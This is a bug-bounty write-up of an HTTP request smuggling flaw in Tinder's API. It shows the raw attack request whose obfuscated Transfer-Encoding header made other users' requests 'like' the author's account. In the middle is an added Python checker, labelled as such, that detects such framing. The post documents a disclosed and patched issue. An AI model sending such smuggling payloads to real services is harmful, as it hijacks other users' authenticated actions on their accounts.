How Did Tons of People Like Me on Tinder?
Posted by mustafa iran on November 23, 2019
These days, dating apps like Tinder are very popular, so they attracted my attention too, back in 2016. In this blog post, I will tell you why tons of people liked me in just a minute. At this point I should say that I am not handsome; the reason is pretty different. 🙂 However, for those who are after plenty of likes, this post might be some kind of clickbait for you, because it is not possible anymore (thanks to me 🙂), at least using the technique here (share with me if you have any 🙂). You have been warned. Keep reading if you are curious about the technical reason.
OK, let's get to business. I have been using the app since 2016. When Anand Prakash posted about the bug he had found in Tinder (which turned out to actually be in Account Kit by Facebook), I facepalmed, because I had also guessed the same vulnerability but I was too lazy and hopeless to check it out. Since then, I have wanted to find a nice Tinder vulnerability, and put it on my to-do list for my career 🙂
In August 2019, James Kettle published a new paper about HTTP request smuggling vulnerabilities. (I suggest you read the paper, otherwise you may not follow the rest of this post.) I read the paper and was honestly impressed by the technical details and consequences of the vulnerability. I also thought that it might make it possible to exploit my other attack scenarios. I wanted to look for places I would like to hack. Surprisingly (maybe not, since it was a new thing), multiple Tinder applications were vulnerable to smuggling attacks. So I was like, “OK, there is the vulnerability, what should be done to provide a POC?”
I reported the vulnerability without a POC to avoid a potential duplicate, which is the nightmare of a BB hunter, or to find out whether it was already known. Luckily, it wasn’t. (14th of August 2019)
The Tinder app uses a backend, api.gotinder.com, which accepts requests formatted as JSON. This creates a tasteless situation when exploiting a smuggling vulnerability. I didn't come across a handy cache mechanism at a glance. So I searched a bit and focused on the “like” request, which is sent using the GET method. The request below is an example of a like request. __BENİM_ID__ is my Tinder user id. The dynamic parts are the id of the one you liked and some authorization and authentication tokens.
GET /like/__BENİM_ID__?locale=tr&s_number=852101394 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:70.0) Gecko/20100101 Firefox/70.0
Accept-Encoding: gzip, deflate
app-session-id: _belongs_the_one_who_send like__
user-session-id: _belongs_the_one_who_send like__
X-Auth-Token: _belongs_the_one_who_send like__
I needed to build a malicious request and join it together with a request which “likes” my account. I came up with the below.
POST /profile/photos HTTP/1.1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36
Accept-Encoding: gzip, deflate
Transfer-Encoding : chunked
GET /like/__BENİM_ID__?locale=en&s_number=799974200 HTTP/1.1
There is no special purpose to /profile/photos. It is enough that the request is not rejected or directed to a different endpoint. The part below it is a “like” request sent for my own account. As you can see, there is not much left of the original “like” request. The reason is to let the victim complete the rest with his/her own request, because the idea of smuggling is to join our request (the prefix) together with the victim’s request. So victims complete it with their own authorization and authentication headers.
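The attack request above relies on the front end and the back end disagreeing about where a request ends; note its `Transfer-Encoding : chunked` line with a space before the colon. As an added example (not code from the original post or from Tinder), this Python check flags request heads with that kind of ambiguous framing, following RFC 7230. The function name, the sample host and the Content-Length value are assumptions.

```python
import re

# RFC 7230 "token": the only characters allowed in a header field-name.
TOKEN = re.compile(r"[!#$%&'*+\-.^_`|~0-9A-Za-z]+")

def framing_findings(raw_head):
    """Return reasons a request head has ambiguous framing ([] means clean)."""
    findings, lengths, encodings = [], [], []
    head = raw_head.split(b"\r\n\r\n", 1)[0].decode("latin-1")
    for line in head.split("\r\n")[1:]:          # skip the request line
        if not line:
            continue
        if line[0] in " \t":
            findings.append("obsolete line folding")
            continue
        name, sep, value = line.partition(":")
        if not sep:
            findings.append(f"header line without colon: {line!r}")
            continue
        if not TOKEN.fullmatch(name):
            # Catches 'Transfer-Encoding : chunked' (space before the colon),
            # which RFC 7230 section 3.2.4 requires servers to reject with 400.
            findings.append(f"malformed field-name: {name!r}")
        key = name.strip().lower()
        if key == "content-length":
            lengths.append(value.strip())
        elif key == "transfer-encoding":
            encodings.append(value.strip().lower())
    if len(set(lengths)) > 1:
        findings.append("conflicting Content-Length values")
    if any(not re.fullmatch(r"[0-9]+", v) for v in lengths):
        findings.append("non-numeric Content-Length")
    if lengths and encodings:
        findings.append("both Content-Length and Transfer-Encoding present")
    if any(v != "chunked" for v in encodings):
        # Strict policy chosen for this example, not an RFC requirement.
        findings.append("Transfer-Encoding other than plain 'chunked'")
    return findings

# Constructed samples: SUSPECT copies the header shape of the attack request
# above (Host and Content-Length values are made up); CLEAN is an ordinary GET.
SUSPECT = (b"POST /profile/photos HTTP/1.1\r\nHost: api.example.test\r\n"
           b"Content-Length: 10\r\nTransfer-Encoding : chunked\r\n\r\n")
CLEAN = (b"GET /like/123?locale=en HTTP/1.1\r\nHost: api.example.test\r\n"
         b"Accept-Encoding: gzip, deflate\r\n\r\n")

if __name__ == "__main__":
    for label, head in (("suspect", SUSPECT), ("clean", CLEAN)):
        print(label, framing_findings(head))
```

A front end or WAF hook would reject any request with a non-empty result before forwarding it to the back end.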
I changed the script of the Burp smuggling extension to make only the attack request and not the victim requests. The extension config was something like the below.
[Screenshot: Burp smuggling extension configuration]
I fired up the attack button and Boom! 🙂 I got hundreds of likes in minutes 🙂
Actually, they hadn’t swiped right on me, but I had made them like my account. I got a working POC. An ultimate “boost” feature for free. By using this, I could enumerate all users on Tinder or sell an ultimate boosting service. Likes are nice, but there is a saying in Turkish: no pleasant things happen with enforcement. It was time to add the POC to the report (24 August 2019).
It would be my second laziness not to escalate it to a full account takeover vulnerability. However, the Tinder team threw me a curve by mitigating the issue in hours.
I reported the smuggling issue for other Tinder domains and they marked all of them as duplicates of the report which I wrote about in this post. Even though it was mitigated in hours, it took months to mark it as resolved. On the 22nd of October, it was marked as resolved and rewarded with $2,5K.
Thanks for reading.